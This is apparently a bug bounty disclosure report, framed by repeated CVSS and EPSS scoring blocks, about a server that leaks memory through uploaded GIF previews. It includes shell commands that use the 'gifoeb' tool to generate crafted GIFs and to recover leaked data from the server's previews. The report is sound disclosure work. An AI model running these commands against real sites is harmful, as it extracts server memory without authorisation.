6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N
0.015 Low
EPSS
Percentile
85.3%
Hi security team,
Summary: Please refer to #302885 for more details. Uploading a .gif produces significantly different images every time which means the server is leaking information.
r=$(identify -format '%wx%h' preview.ext[0]) && for i in `seq 1 10` ; do ./gifoeb gen $r for_upload/$i.gif; done
for p in previews/*; do ./gifoeb recover $p | strings; done
Also while trying that I noticed there is no limit on how large of a gif a person can upload which could lead to some bottlenecks. https://www.niche.co/users/script-1-alert-script/posts
Even though the first 2 attempts did not reveal sensitive data I think it is enough as a POC. Feel free to check out the uploads. If marked as Needs More Info I can keep trying to get sensitive data.
By automating the process an attacker can gain valuable information from the server.
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N
0.015 Low
EPSS
Percentile
85.3%